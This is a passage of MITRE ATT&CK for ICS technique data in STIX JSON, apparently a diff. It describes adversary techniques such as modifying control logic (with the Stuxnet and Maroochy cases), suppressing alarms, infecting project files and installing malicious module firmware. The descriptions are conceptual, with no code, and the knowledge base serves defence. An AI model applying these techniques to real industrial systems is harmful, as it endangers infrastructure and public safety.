"https://attack.mitre.org/techniques/T0884", + "external_id": "T0884" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Connection Proxy Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1090" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Standard Application Layer Protocol", + "description": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0869", + "external_id": "T0869" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21T17:43:26.506Z", + "modified": "2022-05-06T17:47:24.401Z", + "name": "Modify Control Logic", + "description": "Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. \n\nProgram code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active.\n\nAn adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools.\n\nAn adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. \n\nIt is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the “real” pressure is for given analog signals and then automatically linearize the measurement to what would be the “real” pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be “corrected” during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. (Citation: Stuxnet - Langner - 201311)\n\nIn the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0833", + "external_id": "T0833" + }, + { + "source_name": "Stuxnet - Langner - 201311", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + }, + { + "source_name": "Maroochy - MITRE - 200808", + "description": "Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.", + "url": "https://www.mitre.org/sites/default/files/pdf/08%201145.pdf" + } + ], + "x_mitre_deprecated": true, + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Remote Services", + "description": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019) \n\nRemote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) to multiple network segments, and can be used for [Program Download](https://attack.mitre.org/techniques/T0843) or to execute attacks on control devices directly through [Valid Accounts](https://attack.mitre.org/techniques/T0859).\n\nSpecific remote services (RDP & VNC) may be a precursor to enable [Graphical User Interface](https://attack.mitre.org/techniques/T0823) execution on devices such as HMIs or engineering workstation software.\n\nBased on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Daisuke Suzuki" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Control Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Module: Module Load", + "Network Share: Network Share Access", + "Process: Process Creation", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Connection Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "created": "2021-04-12T19:26:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0886", + "external_id": "T0886" + }, + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "I/O Module Discovery", + "description": "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0824", + "external_id": "T0824" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-30T20:15:14.260Z", + "name": "Denial of Control", + "description": "Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nIn the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0813", + "external_id": "T0813" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Mark Loveless April 2017", + "description": "Mark Loveless 2017, April 11 THE DALLAS COUNTY SIREN HACK Retrieved. 2020/11/06 ", + "url": "https://duo.com/decipher/the-dallas-county-siren-hack" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:17:43.803Z", + "name": "Modify Alarm Settings", + "description": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. \n\nIf an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. \n\nIn ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Device Configuration/Parameters" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content", + "Asset: Asset Inventory" + ], + "type": "attack-pattern", + "id": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0838", + "external_id": "T0838" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Commonly Used Port", + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. \n \n * TCP:80 (HTTP) \n * TCP:443 (HTTPS) \n * TCP/UDP:53 (DNS) \n * TCP:1024-4999 (OPC on XP/Win2k3) \n * TCP:49152-65535 (OPC on Vista and later) \n * TCP:23 (TELNET) \n * UDP:161 (SNMP) \n * TCP:502 (MODBUS) \n * TCP:102 (S7comm/ISO-TSAP) \n * TCP:20000 (DNP3) \n * TCP:44818 (Ethernet/IP)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0885", + "external_id": "T0885" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T18:58:24.092Z", + "name": "Project File Infection", + "description": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev) \n\nAdversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. (Citation: PLCdev)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0873", + "external_id": "T0873" + }, + { + "source_name": "Beckhoff", + "description": "Beckhoff TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21 ", + "url": "https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "PLCdev", + "description": "PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 2019/11/21 ", + "url": "http://www.plcdev.com/book/export/html/373" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Network Connection Enumeration", + "description": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Script: Script Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0840", + "external_id": "T0840" + }, + { + "source_name": "MITRE", + "description": "MITRE System Network Connections Discovery Retrieved. 2018/05/31 ", + "url": "https://attack.mitre.org/wiki/Technique/T1049" + }, + { + "source_name": "Netstat", + "description": "Wikipedia. (n.d.). Netstat. Retrieved May 23, 2022.", + "url": "https://en.wikipedia.org/wiki/Netstat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Lateral Tool Transfer", + "description": "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)\n\nIn control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "File: File Creation", + "File: File Metadata", + "Network Share: Network Share Access", + "Network Traffic: Network Traffic Flow", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0867", + "external_id": "T0867" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Lateral Tool Transfer Retrieved. 2019/10/27 Lateral Tool Transfer Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1570/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Module Firmware", + "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. \n\nThis technique is similar to [System Firmware](https://attack.mitre.org/techniques/T0857), but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: Daniel Peck, Dale Peterson January 2009) \n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: Daniel Peck, Dale Peterson January 2009) \n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. \n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. \n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. \n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. \n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0839", + "external_id": "T0839" + }, + { + "source_name": "Daniel Peck, Dale Peterson January 2009", + "description": "Daniel Peck, Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ", + "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Internet Accessible Device", + "description": "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique.\n\nAdversaries may leverage built in functions for remote access which may not be protected or utilize minimal legacy protections that may be targeted. (Citation: NCCIC January 2014) These services may be discoverable through the use of online scanning tools. \n\nIn the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing. (Citation: NCCIC January 2014) (Citation: Danny Yadron December 2015) (Citation: Mark Thompson March 2016)\n\nIn Trend Micros manufacturing deception operations adversaries were detected leveraging direct internet access to an ICS environment through the exposure of operational protocols such as Siemens S7, Omron FINS, and EtherNet/IP, in addition to misconfigured VNC access. (Citation: Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0883", + "external_id": "T0883" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on 